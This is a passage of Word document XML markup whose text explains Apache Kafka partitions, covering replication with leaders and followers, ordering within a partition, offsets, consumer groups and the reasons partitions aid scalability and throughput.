        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="779"/>
    </w:p>
    <w:p w14:paraId="7DCD658F" w14:textId="37F8C4D3" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kafka Partitions: Definition and Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE14A9" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a fundamental concept in Kafka’s architecture, allowing it to scale and achieve high throughput. A partition is essentially a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log file</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where messages (records) are written in an append-only manner. Each partition is an ordered, immutable sequence of records, and it acts as the basic unit of parallelism and data distribution in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B7F05" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Key Features of Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB4C4AC" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>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Message Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Kafka topics are divided into multiple partitions. Each partition can be hosted on different brokers, allowing for distributed storage and processing. This helps achieve high scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9DCDD" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>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Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Kafka supports </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of partitions to ensure fault tolerance. Each partition has one or more replicas, and one replica is the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while the others are </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>followers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The leader handles all read and write operations, while the followers replicate the leader's data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CAF714" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>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Message Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Kafka guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, the ordering is not guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>across multiple partitions. This means that messages within a partition are strictly ordered, but Kafka does not provide ordering guarantees when messages are spread across different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75B094" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>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Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Partitions allow Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelize</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing, as each consumer in a consumer group can read from a different partition in parallel. This enables Kafka to scale efficiently and process large volumes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703F069" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>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Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Each message within a partition is assigned a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which acts as an identifier for the message. Consumers track their progress by maintaining their last processed offset for each partition, allowing for fine-grained control over message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2AD364" w14:textId="77777777" w:rsidR="00DD2097"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F7FE592">
          <v:rect id="_x0000_i3152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFCAF11" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Why are Partitions Used in Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5163C" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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1. Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2EDC2" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Kafka is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Partitions enable Kafka to scale across multiple brokers, as each partition can be distributed across different machines (brokers). This way, Kafka can handle a huge number of messages by distributing them across multiple partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74283651" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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2. Increased Throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8B198" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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By splitting a topic into multiple partitions, Kafka can read and write messages to multiple partitions in parallel. This improves the throughput of the system because it utilizes multiple threads and machines to handle the data, making Kafka very efficient for high-volume use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981EAE9" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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3. Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681DCC8D" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Kafka replicates each partition to multiple brokers. If one broker fails, another broker that holds a replica of the partition can take over as the leader, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no data loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high availability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D2A3E" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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4. Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A7160" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Each consumer in a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is assigned one or more partitions to read from. Since partitions can be spread across brokers, this allows for better load balancing as different consumers can process different partitions simultaneously, improving performance and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C5C73" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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5. Message Parallelism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E362E5" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Kafka allows multiple consumers to read from the same topic at the same time, where each consumer can read from a different partition. This parallelism increases the ability to process large amounts of data quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B55D117" w14:textId="77777777" w:rsidR="00DD2097"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89717EF">
          <v:rect id="_x0000_i3153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="564360C1" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Kafka Partitioning: How Data is Stored and Consumed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3C0A0" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>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Message Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">When a producer sends a message to a Kafka topic, Kafka determines to which partition the message will be written. If a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition key</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as the message's key) is provided, Kafka uses it to determine the partition. If no key is provided, Kafka will distribute the messages randomly (or using a round-robin approach).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961A546" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>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Partitioning and Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E3EAE" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>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Partition Leader</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition has a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replica that handles all read and write requests. The leader is responsible for ensuring data consistency across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787614B" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>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Partition Follower</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each partition also has </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which replicate the data from the leader. In case of a leader failure, one of the followers is promoted to become the new leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC4A0B" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>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Consumers and Consumer Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA172FE" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>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Consumer Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A group of consumers working together is called a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Kafka assigns each consumer in the group to one or more partitions. This means each partition is read by only one consumer within a group at a time, ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in data consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC562CD" w14:textId="77777777" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
